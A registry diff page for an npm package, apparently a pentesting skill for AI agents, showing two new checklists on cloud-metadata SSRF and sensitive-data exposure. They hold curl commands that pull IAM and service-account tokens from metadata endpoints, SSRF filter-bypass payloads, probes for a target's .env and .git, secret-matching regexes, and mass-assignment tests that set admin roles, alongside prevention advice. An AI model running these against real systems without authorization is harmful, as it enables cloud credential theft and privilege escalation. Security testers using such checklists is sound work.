@soulofzephir/pi-skill-pentesting 1.0.2 โ 1.0.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +1 -1
- package/skills/pentesting/SKILL.md +122 -112
- package/skills/pentesting/checklists/api-security.md +210 -0
- package/skills/pentesting/checklists/cloud-metadata.md +290 -0
- package/skills/pentesting/checklists/sensitive-data.md +323 -0
- package/skills/pentesting/checklists/subdomain.md +243 -0
- package/skills/pentesting/checklists/websocket.md +197 -0
- package/skills/pentesting/tools/exposed-files-scan.ps1 +141 -238
- package/skills/pentesting/tools/full-scan.ps1 +278 -316
- package/soulofzephir-pi-skill-pentesting-1.0.2.tgz +0 -0
- package/soulofzephir-pi-skill-pentesting-1.0.3.tgz +0 -0
- package/soulofzephir-pi-skill-pentesting-1.0.4.tgz +0 -0
|
@@ -0,0 +1,290 @@
|
|
|
1
|
+
# Cloud Metadata Service Security
|
|
2
|
+
|
|
3
|
+
## ๐ What is Cloud Metadata?
|
|
4
|
+
|
|
5
|
+
Cloud providers expose instance metadata at a well-known IP address. This can contain sensitive information including credentials!
|
|
6
|
+
|
|
7
|
+
---
|
|
8
|
+
|
|
9
|
+
## โ ๏ธ CRITICAL: Metadata Endpoints
|
|
10
|
+
|
|
11
|
+
### AWS EC2
|
|
12
|
+
```
|
|
13
|
+
http://169.254.169.254/ (latest)
|
|
14
|
+
http://169.254.169.254/2009-04-04/ (specific version)
|
|
15
|
+
http://169.254.169.254/latest/meta-data/
|
|
16
|
+
http://169.254.169.254/latest/user-data/
|
|
17
|
+
```
|
|
18
|
+
|
|
19
|
+
### Google Cloud Platform (GCP)
|
|
20
|
+
```
|
|
21
|
+
http://metadata.google.internal/computeMetadata/v1/
|
|
22
|
+
http://metadata.google.internal/computeMetadata/v1/instance/
|
|
23
|
+
http://metadata.google.internal/computeMetadata/v1/project/
|
|
24
|
+
```
|
|
25
|
+
|
|
26
|
+
### Microsoft Azure
|
|
27
|
+
```
|
|
28
|
+
http://169.254.169.254/metadata/instance
|
|
29
|
+
http://169.254.169.254/metadata/instance?api-version=2021-02-01
|
|
30
|
+
```
|
|
31
|
+
|
|
32
|
+
### DigitalOcean
|
|
33
|
+
```
|
|
34
|
+
http://169.254.169.254/metadata/v1/
|
|
35
|
+
http://169.254.169.254/metadata/v1.json
|
|
36
|
+
```
|
|
37
|
+
|
|
38
|
+
---
|
|
39
|
+
|
|
40
|
+
## โ ๏ธ SSRF to Cloud Metadata - CRITICAL
|
|
41
|
+
|
|
42
|
+
**Attack Vector:**
|
|
43
|
+
```
|
|
44
|
+
Attacker finds SSRF vulnerability
|
|
45
|
+
โ
|
|
46
|
+
Forces application to request metadata endpoint
|
|
47
|
+
โ
|
|
48
|
+
Steals cloud credentials
|
|
49
|
+
โ
|
|
50
|
+
Full cloud account compromise!
|
|
51
|
+
```
|
|
52
|
+
|
|
53
|
+
---
|
|
54
|
+
|
|
55
|
+
## ๐งช Testing Checklist
|
|
56
|
+
|
|
57
|
+
### Phase 1: SSRF Detection
|
|
58
|
+
- [ ] URL parameters tested (url, src, dest, redirect, uri, path)
|
|
59
|
+
- [ ] POST body parameters tested
|
|
60
|
+
- [ ] HTTP headers tested (Referer, X-Forwarded-For)
|
|
61
|
+
- [ ] File upload (path traversal in filename)
|
|
62
|
+
- [ ] SVG upload (XXE)
|
|
63
|
+
- [ ] XML parsers (XXE)
|
|
64
|
+
|
|
65
|
+
### Phase 2: Metadata Endpoint Access
|
|
66
|
+
- [ ] AWS metadata accessible?
|
|
67
|
+
- [ ] GCP metadata accessible?
|
|
68
|
+
- [ ] Azure metadata accessible?
|
|
69
|
+
- [ ] DigitalOcean metadata accessible?
|
|
70
|
+
- [ ] Alibaba Cloud metadata accessible?
|
|
71
|
+
|
|
72
|
+
### Phase 3: Metadata Data Exposed
|
|
73
|
+
- [ ] Instance ID exposed
|
|
74
|
+
- [ ] IAM credentials exposed (AWS role)
|
|
75
|
+
- [ ] IAM token exposed
|
|
76
|
+
- [ ] User data exposed (often contains scripts/config)
|
|
77
|
+
- [ ] SSH keys exposed (GCP)
|
|
78
|
+
- [ ] Service account tokens exposed (GCP)
|
|
79
|
+
|
|
80
|
+
### Phase 4: Credential Exploitation
|
|
81
|
+
- [ ] IAM role can be assumed
|
|
82
|
+
- [ ] AWS CLI configured with stolen credentials
|
|
83
|
+
- [ ] S3 buckets accessible
|
|
84
|
+
- [ ] Other AWS services accessible
|
|
85
|
+
|
|
86
|
+
---
|
|
87
|
+
|
|
88
|
+
## ๐ง Testing Commands
|
|
89
|
+
|
|
90
|
+
### AWS Metadata Check
|
|
91
|
+
```bash
|
|
92
|
+
# Basic metadata access
|
|
93
|
+
curl http://169.254.169.254/latest/meta-data/
|
|
94
|
+
curl http://169.254.169.254/latest/user-data/
|
|
95
|
+
|
|
96
|
+
# IAM credentials (if vulnerable)
|
|
97
|
+
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
|
98
|
+
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
|
|
99
|
+
|
|
100
|
+
# Get token (newer versions)
|
|
101
|
+
curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token: true"
|
|
102
|
+
```
|
|
103
|
+
|
|
104
|
+
### GCP Metadata Check
|
|
105
|
+
```bash
|
|
106
|
+
# Must include header
|
|
107
|
+
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/
|
|
108
|
+
|
|
109
|
+
# Instance info
|
|
110
|
+
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/id
|
|
111
|
+
|
|
112
|
+
# Service account
|
|
113
|
+
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
|
|
114
|
+
|
|
115
|
+
# Access token (if vulnerable!)
|
|
116
|
+
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
|
|
117
|
+
```
|
|
118
|
+
|
|
119
|
+
### Azure Metadata Check
|
|
120
|
+
```bash
|
|
121
|
+
# Requires API version
|
|
122
|
+
curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
|
|
123
|
+
|
|
124
|
+
# Managed identity token
|
|
125
|
+
curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com"
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
### DigitalOcean Metadata
|
|
129
|
+
```bash
|
|
130
|
+
curl http://169.254.169.254/metadata/v1.json
|
|
131
|
+
curl http://169.254.169.254/metadata/v1/user-data
|
|
132
|
+
```
|
|
133
|
+
|
|
134
|
+
---
|
|
135
|
+
|
|
136
|
+
## ๐ง SSRF Payloads for Metadata
|
|
137
|
+
|
|
138
|
+
### Basic
|
|
139
|
+
```
|
|
140
|
+
http://169.254.169.254/
|
|
141
|
+
http://169.254.169.254/latest/meta-data/
|
|
142
|
+
http://169.254.169.254/latest/user-data/
|
|
143
|
+
```
|
|
144
|
+
|
|
145
|
+
### With Headers
|
|
146
|
+
```bash
|
|
147
|
+
# AWS - get token first
|
|
148
|
+
curl -X PUT -H "X-aws-ec2-metadata-token: anything" http://target.com/url?param=http://169.254.169.254/latest/meta-data/
|
|
149
|
+
|
|
150
|
+
# GCP - require header
|
|
151
|
+
curl -H "Metadata-Flavor: Google" http://target.com/url?param=http://metadata.google.internal/
|
|
152
|
+
```
|
|
153
|
+
|
|
154
|
+
### Bypass Filters
|
|
155
|
+
```bash
|
|
156
|
+
# IP encoding
|
|
157
|
+
http://127.0.0.1
|
|
158
|
+
http://2130706433 (decimal)
|
|
159
|
+
http://0x7f000001 (hex)
|
|
160
|
+
http://[::1]
|
|
161
|
+
|
|
162
|
+
# URL encoding
|
|
163
|
+
http://169.254.169.254 โ http://%31%36%39.%32%35%34.%31%36%39.%32%35%34
|
|
164
|
+
|
|
165
|
+
# DNS rebinding
|
|
166
|
+
http://attacker.com -> points to 169.254.169.254
|
|
167
|
+
|
|
168
|
+
# Open redirect
|
|
169
|
+
http://target.com/redirect?url=http://169.254.169.254/
|
|
170
|
+
```
|
|
171
|
+
|
|
172
|
+
---
|
|
173
|
+
|
|
174
|
+
## ๐ SSRF Test Parameters
|
|
175
|
+
|
|
176
|
+
Common parameter names to test:
|
|
177
|
+
```
|
|
178
|
+
url
|
|
179
|
+
src
|
|
180
|
+
source
|
|
181
|
+
uri
|
|
182
|
+
link
|
|
183
|
+
redirect
|
|
184
|
+
path
|
|
185
|
+
continue
|
|
186
|
+
url
|
|
187
|
+
window
|
|
188
|
+
next
|
|
189
|
+
data
|
|
190
|
+
reference
|
|
191
|
+
spider
|
|
192
|
+
baseUrl
|
|
193
|
+
xml
|
|
194
|
+
view
|
|
195
|
+
doc
|
|
196
|
+
site
|
|
197
|
+
html
|
|
198
|
+
feed
|
|
199
|
+
host
|
|
200
|
+
port
|
|
201
|
+
to
|
|
202
|
+
out
|
|
203
|
+
view
|
|
204
|
+
dir
|
|
205
|
+
show
|
|
206
|
+
navigation
|
|
207
|
+
open
|
|
208
|
+
file
|
|
209
|
+
val
|
|
210
|
+
validate
|
|
211
|
+
domain
|
|
212
|
+
callback
|
|
213
|
+
return
|
|
214
|
+
page
|
|
215
|
+
feed
|
|
216
|
+
host
|
|
217
|
+
pass
|
|
218
|
+
data
|
|
219
|
+
address
|
|
220
|
+
link
|
|
221
|
+
url
|
|
222
|
+
```
|
|
223
|
+
|
|
224
|
+
---
|
|
225
|
+
|
|
226
|
+
## ๐ก๏ธ Cloud Metadata Protection Checklist
|
|
227
|
+
|
|
228
|
+
### For Cloud Providers (Disable IMDS)
|
|
229
|
+
```bash
|
|
230
|
+
# AWS - require IMDSv2
|
|
231
|
+
aws ec2 modify-instance-metadata-options \
|
|
232
|
+
--instance-id i-1234567890abcdef0 \
|
|
233
|
+
--http-tokens required \
|
|
234
|
+
--http-put-response-hop-limit 1
|
|
235
|
+
|
|
236
|
+
# GCP - disable via metadata server
|
|
237
|
+
# No direct disable, but use:
|
|
238
|
+
# - Service account with minimal permissions
|
|
239
|
+
# - No legacy endpoints
|
|
240
|
+
# - VPC firewall rules
|
|
241
|
+
|
|
242
|
+
# Azure
|
|
243
|
+
# Use IMDS with managed identity
|
|
244
|
+
# Restrict via firewall
|
|
245
|
+
```
|
|
246
|
+
|
|
247
|
+
### For Application Developers
|
|
248
|
+
- [ ] Validate all user input
|
|
249
|
+
- [ ] Use allowlist for URLs
|
|
250
|
+
- [ ] Block private IP ranges
|
|
251
|
+
- [ ] Disable unnecessary URL schemas
|
|
252
|
+
- [ ] Use security library (no direct URL fetching)
|
|
253
|
+
- [ ] Implement SSRF protection
|
|
254
|
+
- [ ] Log SSRF attempts
|
|
255
|
+
|
|
256
|
+
### For Cloud Security
|
|
257
|
+
- [ ] Use IMDSv2 (AWS)
|
|
258
|
+
- [ ] Use service accounts with minimal privileges
|
|
259
|
+
- [ ] No long-lived credentials in instance metadata
|
|
260
|
+
- [ ] Regular audit of IAM roles
|
|
261
|
+
- [ ] Enable VPC endpoints
|
|
262
|
+
- [ ] Network segmentation
|
|
263
|
+
|
|
264
|
+
---
|
|
265
|
+
|
|
266
|
+
## ๐ Risk Assessment
|
|
267
|
+
|
|
268
|
+
| Finding | Severity | CVSS |
|
|
269
|
+
|---------|----------|------|
|
|
270
|
+
| AWS metadata accessible | ๐ด CRITICAL | 10.0 |
|
|
271
|
+
| GCP service account token stolen | ๐ด CRITICAL | 10.0 |
|
|
272
|
+
| Azure managed identity exploited | ๐ด CRITICAL | 9.8 |
|
|
273
|
+
| Arbitrary file read (metadata) | ๐ด CRITICAL | 9.8 |
|
|
274
|
+
| SSRF without credentials | ๐ HIGH | 8.6 |
|
|
275
|
+
|
|
276
|
+
---
|
|
277
|
+
|
|
278
|
+
## ๐จ Real-World Impact
|
|
279
|
+
|
|
280
|
+
```
|
|
281
|
+
1. Attacker finds SSRF in web app
|
|
282
|
+
2. Attacker requests AWS metadata
|
|
283
|
+
3. Attacker steals IAM credentials
|
|
284
|
+
4. Attacker assumes admin role
|
|
285
|
+
5. Attacker has full AWS access
|
|
286
|
+
6. Attacker exfiltrates all data
|
|
287
|
+
7. Attacker creates backdoor
|
|
288
|
+
```
|
|
289
|
+
|
|
290
|
+
**Prevention:** Always assume SSRF exists, protect metadata endpoints!
|
|
@@ -0,0 +1,323 @@
|
|
|
1
|
+
# Sensitive Data Exposure Detection
|
|
2
|
+
|
|
3
|
+
## ๐ What is Sensitive Data?
|
|
4
|
+
|
|
5
|
+
Data that must be protected from unauthorized access:
|
|
6
|
+
- Personal Identifiable Information (PII)
|
|
7
|
+
- Financial data
|
|
8
|
+
- Authentication credentials
|
|
9
|
+
- Healthcare information
|
|
10
|
+
- Business secrets
|
|
11
|
+
|
|
12
|
+
---
|
|
13
|
+
|
|
14
|
+
## โ ๏ธ Common Sources of Data Exposure
|
|
15
|
+
|
|
16
|
+
### 1. Source Code Exposure
|
|
17
|
+
```
|
|
18
|
+
.git/ directory
|
|
19
|
+
_backup.zip
|
|
20
|
+
*.bak
|
|
21
|
+
*.swp
|
|
22
|
+
*.tmp
|
|
23
|
+
```
|
|
24
|
+
|
|
25
|
+
### 2. Configuration Files
|
|
26
|
+
```
|
|
27
|
+
.env
|
|
28
|
+
config.php
|
|
29
|
+
wp-config.php
|
|
30
|
+
settings.py
|
|
31
|
+
application.properties
|
|
32
|
+
```
|
|
33
|
+
|
|
34
|
+
### 3. API Responses
|
|
35
|
+
```
|
|
36
|
+
Excessive data exposure
|
|
37
|
+
Missing field filtering
|
|
38
|
+
Debug responses
|
|
39
|
+
```
|
|
40
|
+
|
|
41
|
+
### 4. Client-Side Data
|
|
42
|
+
```
|
|
43
|
+
JavaScript source maps
|
|
44
|
+
localStorage/sessionStorage
|
|
45
|
+
Cookies
|
|
46
|
+
URL parameters
|
|
47
|
+
```
|
|
48
|
+
|
|
49
|
+
---
|
|
50
|
+
|
|
51
|
+
## ๐งช Testing Checklist
|
|
52
|
+
|
|
53
|
+
### Phase 1: Sensitive Files
|
|
54
|
+
- [ ] `.env` files exposed
|
|
55
|
+
- [ ] `.git/` directory accessible
|
|
56
|
+
- [ ] Backup files exposed
|
|
57
|
+
- [ ] Configuration files accessible
|
|
58
|
+
- [ ] Database dumps exposed
|
|
59
|
+
|
|
60
|
+
### Phase 2: Source Code
|
|
61
|
+
- [ ] Source maps (.map) exposed
|
|
62
|
+
- [ ] JavaScript source code analyzed
|
|
63
|
+
- [ ] Debug endpoints accessible
|
|
64
|
+
- [ ] Swagger/OpenAPI docs exposed
|
|
65
|
+
- [ ] Internal paths in JS
|
|
66
|
+
|
|
67
|
+
### Phase 3: API Responses
|
|
68
|
+
- [ ] Full data returned vs needed
|
|
69
|
+
- [ ] Hidden fields in JSON
|
|
70
|
+
- [ ] Passwords in responses
|
|
71
|
+
- [ ] Internal IDs exposed
|
|
72
|
+
- [ ] Stack traces in errors
|
|
73
|
+
|
|
74
|
+
### Phase 4: Client Storage
|
|
75
|
+
- [ ] Sensitive data in localStorage
|
|
76
|
+
- [ ] Sensitive data in sessionStorage
|
|
77
|
+
- [ ] Sensitive data in cookies
|
|
78
|
+
- [ ] Sensitive data in URL
|
|
79
|
+
- [ ] Browser history
|
|
80
|
+
|
|
81
|
+
### Phase 5: Credentials Detection
|
|
82
|
+
- [ ] API keys in source code
|
|
83
|
+
- [ ] AWS credentials in source
|
|
84
|
+
- [ ] Private keys exposed
|
|
85
|
+
- [ ] Database passwords
|
|
86
|
+
- [ ] JWT tokens
|
|
87
|
+
|
|
88
|
+
### Phase 6: PII Exposure
|
|
89
|
+
- [ ] Email addresses
|
|
90
|
+
- [ ] Phone numbers
|
|
91
|
+
- [ ] Physical addresses
|
|
92
|
+
- [ ] Social security numbers
|
|
93
|
+
- [ ] Dates of birth
|
|
94
|
+
|
|
95
|
+
---
|
|
96
|
+
|
|
97
|
+
## ๐ง Detection Tools
|
|
98
|
+
|
|
99
|
+
### grep for Secrets
|
|
100
|
+
```bash
|
|
101
|
+
# Search for API keys
|
|
102
|
+
grep -r "api_key\|apikey\|api-key" . --include="*.js" --include="*.json"
|
|
103
|
+
grep -r "aws_access_key\|aws_secret" . --include="*.py" --include="*.js"
|
|
104
|
+
grep -r "password\|pwd\|pass" . --include="*.js" --include="*.json"
|
|
105
|
+
|
|
106
|
+
# Search for tokens
|
|
107
|
+
grep -r "token\|bearer\|authorization" . --include="*.js" --include="*.json"
|
|
108
|
+
|
|
109
|
+
# Search for private keys
|
|
110
|
+
grep -r "BEGIN RSA PRIVATE KEY\|BEGIN PRIVATE KEY" .
|
|
111
|
+
```
|
|
112
|
+
|
|
113
|
+
### trufflehog (Secrets Scanner)
|
|
114
|
+
```bash
|
|
115
|
+
# Scan git repo
|
|
116
|
+
trufflehog git https://github.com/target/repo.git
|
|
117
|
+
|
|
118
|
+
# Scan filesystem
|
|
119
|
+
trufflehog filesystem .
|
|
120
|
+
|
|
121
|
+
# Scan S3 bucket
|
|
122
|
+
trufflehog s3 --bucket=bucket-name
|
|
123
|
+
|
|
124
|
+
# Scan GitHub org
|
|
125
|
+
trufflehog github --org=target-org
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
### gitrob (GitHub Recon)
|
|
129
|
+
```bash
|
|
130
|
+
gitrob target --no-gist
|
|
131
|
+
```
|
|
132
|
+
|
|
133
|
+
### gitleaks (Secret Scanner)
|
|
134
|
+
```bash
|
|
135
|
+
# Scan repo
|
|
136
|
+
gitleaks detect --source .
|
|
137
|
+
|
|
138
|
+
# Scan with config
|
|
139
|
+
gitleaks detect --source . --config gitleaks.toml
|
|
140
|
+
```
|
|
141
|
+
|
|
142
|
+
### shhgit (Real-time GitHub Scanning)
|
|
143
|
+
```bash
|
|
144
|
+
shhgit -domain github.com -search-keyword "target"
|
|
145
|
+
```
|
|
146
|
+
|
|
147
|
+
---
|
|
148
|
+
|
|
149
|
+
## ๐ง Pattern Detection
|
|
150
|
+
|
|
151
|
+
### API Keys & Tokens
|
|
152
|
+
```
|
|
153
|
+
AKIA[0-9A-Z]{16} โ AWS Access Key
|
|
154
|
+
[0-9a-zA-Z+/]{40} โ AWS Secret Key (base64)
|
|
155
|
+
AIza[0-9A-Za-z_-]{35} โ Google API Key
|
|
156
|
+
sk_live_[0-9a-z]{24,32} โ Stripe
|
|
157
|
+
sk_test_[0-9a-z]{24,32} โ Stripe Test
|
|
158
|
+
ghp_[0-9a-zA-Z]{36} โ GitHub Personal Access Token
|
|
159
|
+
xox[baprs]-[0-9a-zA-Z]{10,} โ Slack Token
|
|
160
|
+
```
|
|
161
|
+
|
|
162
|
+
### Password Patterns
|
|
163
|
+
```
|
|
164
|
+
password=.*
|
|
165
|
+
pwd=.*
|
|
166
|
+
pass=.*
|
|
167
|
+
secret=.*
|
|
168
|
+
credential=.*
|
|
169
|
+
```
|
|
170
|
+
|
|
171
|
+
### Private Keys
|
|
172
|
+
```
|
|
173
|
+
-----BEGIN RSA PRIVATE KEY-----
|
|
174
|
+
-----BEGIN EC PRIVATE KEY-----
|
|
175
|
+
-----BEGIN PRIVATE KEY-----
|
|
176
|
+
-----BEGIN OPENSSH PRIVATE KEY-----
|
|
177
|
+
```
|
|
178
|
+
|
|
179
|
+
### JWT Tokens
|
|
180
|
+
```
|
|
181
|
+
eyJ[0-9A-Za-z_-]*\.eyJ[0-9A-Za-z_-]*\.[0-9A-Za-z_-]*
|
|
182
|
+
```
|
|
183
|
+
|
|
184
|
+
---
|
|
185
|
+
|
|
186
|
+
## ๐ง File Patterns to Check
|
|
187
|
+
|
|
188
|
+
```bash
|
|
189
|
+
# Configuration
|
|
190
|
+
find . -name ".env*" -o -name "*.config*" -o -name "config.*"
|
|
191
|
+
find . -name "*.php" -o -name "*.py" -o -name "*.js"
|
|
192
|
+
|
|
193
|
+
# Backups
|
|
194
|
+
find . -name "*.bak" -o -name "*.backup" -o -name "*.old"
|
|
195
|
+
find . -name "*.zip" -o -name "*.tar" -o -name "*.tar.gz"
|
|
196
|
+
|
|
197
|
+
# Source control
|
|
198
|
+
find . -name ".git" -type d
|
|
199
|
+
find . -name ".svn" -type d
|
|
200
|
+
|
|
201
|
+
# Keys
|
|
202
|
+
find . -name "*.pem" -o -name "*.key" -o -name "*.p12"
|
|
203
|
+
```
|
|
204
|
+
|
|
205
|
+
---
|
|
206
|
+
|
|
207
|
+
## ๐ Data Classification
|
|
208
|
+
|
|
209
|
+
| Type | Sensitivity | Examples |
|
|
210
|
+
|------|------------|----------|
|
|
211
|
+
| ๐ด Critical | Highest | Passwords, Private Keys, SSN |
|
|
212
|
+
| ๐ High | High | API Keys, Tokens, Credit Cards |
|
|
213
|
+
| ๐ก Medium | Medium | Email, Phone, Addresses |
|
|
214
|
+
| ๐ข Low | Low | Public data |
|
|
215
|
+
|
|
216
|
+
---
|
|
217
|
+
|
|
218
|
+
## ๐ ๏ธ API Response Analysis
|
|
219
|
+
|
|
220
|
+
### Test for Excessive Data
|
|
221
|
+
```bash
|
|
222
|
+
# Get user profile - should only return needed fields
|
|
223
|
+
curl -X GET /api/user/123
|
|
224
|
+
|
|
225
|
+
# Check if returns:
|
|
226
|
+
# - Password hash
|
|
227
|
+
# - Internal IDs
|
|
228
|
+
# - Debug info
|
|
229
|
+
# - Other users' data
|
|
230
|
+
```
|
|
231
|
+
|
|
232
|
+
### Test for Hidden Fields
|
|
233
|
+
```html
|
|
234
|
+
<!-- Check HTML forms for hidden inputs -->
|
|
235
|
+
<input type="hidden" name="admin" value="true">
|
|
236
|
+
<input type="hidden" name="role" value="user">
|
|
237
|
+
|
|
238
|
+
# Change hidden field values
|
|
239
|
+
curl -X POST /api/update -d "role=admin" -d "user_id=123"
|
|
240
|
+
```
|
|
241
|
+
|
|
242
|
+
### Test for Mass Assignment
|
|
243
|
+
```bash
|
|
244
|
+
# Try adding extra fields
|
|
245
|
+
curl -X POST /api/user -d "name=test&email=test@test.com&admin=true"
|
|
246
|
+
curl -X PUT /api/user/123 -d "balance=1000&admin=true"
|
|
247
|
+
```
|
|
248
|
+
|
|
249
|
+
---
|
|
250
|
+
|
|
251
|
+
## ๐ Exposure Risk Matrix
|
|
252
|
+
|
|
253
|
+
| Exposure Type | Risk | CVSS |
|
|
254
|
+
|---------------|------|------|
|
|
255
|
+
| Database credentials | ๐ด CRITICAL | 9.8 |
|
|
256
|
+
| AWS keys exposed | ๐ด CRITICAL | 9.8 |
|
|
257
|
+
| Private keys | ๐ด CRITICAL | 9.8 |
|
|
258
|
+
| API keys exposed | ๐ HIGH | 7.5 |
|
|
259
|
+
| PII in logs | ๐ HIGH | 7.1 |
|
|
260
|
+
| Token in URL | ๐ก MEDIUM | 6.5 |
|
|
261
|
+
| Debug info | ๐ก MEDIUM | 5.3 |
|
|
262
|
+
|
|
263
|
+
---
|
|
264
|
+
|
|
265
|
+
## ๐ก๏ธ Prevention Checklist
|
|
266
|
+
|
|
267
|
+
### Source Code
|
|
268
|
+
- [ ] .git/ blocked by web server
|
|
269
|
+
- [ ] No backup files in web root
|
|
270
|
+
- [ ] Source maps disabled in production
|
|
271
|
+
- [ ] No secrets in code
|
|
272
|
+
|
|
273
|
+
### API Responses
|
|
274
|
+
- [ ] Only return needed fields
|
|
275
|
+
- [ ] No passwords/tokens in responses
|
|
276
|
+
- [ ] No internal IDs
|
|
277
|
+
- [ ] Error handling doesn't leak info
|
|
278
|
+
|
|
279
|
+
### Client Storage
|
|
280
|
+
- [ ] No sensitive data in localStorage
|
|
281
|
+
- [ ] Cookies HttpOnly + Secure
|
|
282
|
+
- [ ] No sensitive data in URL
|
|
283
|
+
|
|
284
|
+
### Secrets Management
|
|
285
|
+
- [ ] Use environment variables
|
|
286
|
+
- [ ] Use secret management services
|
|
287
|
+
- [ ] Rotate secrets regularly
|
|
288
|
+
- [ ] No default passwords
|
|
289
|
+
|
|
290
|
+
---
|
|
291
|
+
|
|
292
|
+
## ๐ Quick Scan Commands
|
|
293
|
+
|
|
294
|
+
```bash
|
|
295
|
+
# Search for secrets in JS files
|
|
296
|
+
grep -rn "password\|api_key\|secret\|token" --include="*.js" .
|
|
297
|
+
|
|
298
|
+
# Check for exposed .env
|
|
299
|
+
curl -s target.com/.env | head -20
|
|
300
|
+
|
|
301
|
+
# Check for git directory
|
|
302
|
+
curl -s target.com/.git/config
|
|
303
|
+
|
|
304
|
+
# Check for backups
|
|
305
|
+
curl -s target.com/backup.zip -o /dev/null -w "%{http_code}"
|
|
306
|
+
|
|
307
|
+
# Check API response for sensitive data
|
|
308
|
+
curl -s /api/user/1 | jq 'keys'
|
|
309
|
+
```
|
|
310
|
+
|
|
311
|
+
---
|
|
312
|
+
|
|
313
|
+
## ๐ Sensitive Data Checklist Summary
|
|
314
|
+
|
|
315
|
+
| Check | Status | Severity |
|
|
316
|
+
|-------|--------|----------|
|
|
317
|
+
| .env exposed | โ | ๐ด CRITICAL |
|
|
318
|
+
| .git accessible | โ | ๐ด CRITICAL |
|
|
319
|
+
| API keys in JS | โ | ๐ HIGH |
|
|
320
|
+
| Passwords in response | โ | ๐ด CRITICAL |
|
|
321
|
+
| PII exposed | โ | ๐ HIGH |
|
|
322
|
+
| Token in URL | โ | ๐ก MEDIUM |
|
|
323
|
+
| Debug mode | โ | ๐ HIGH |
|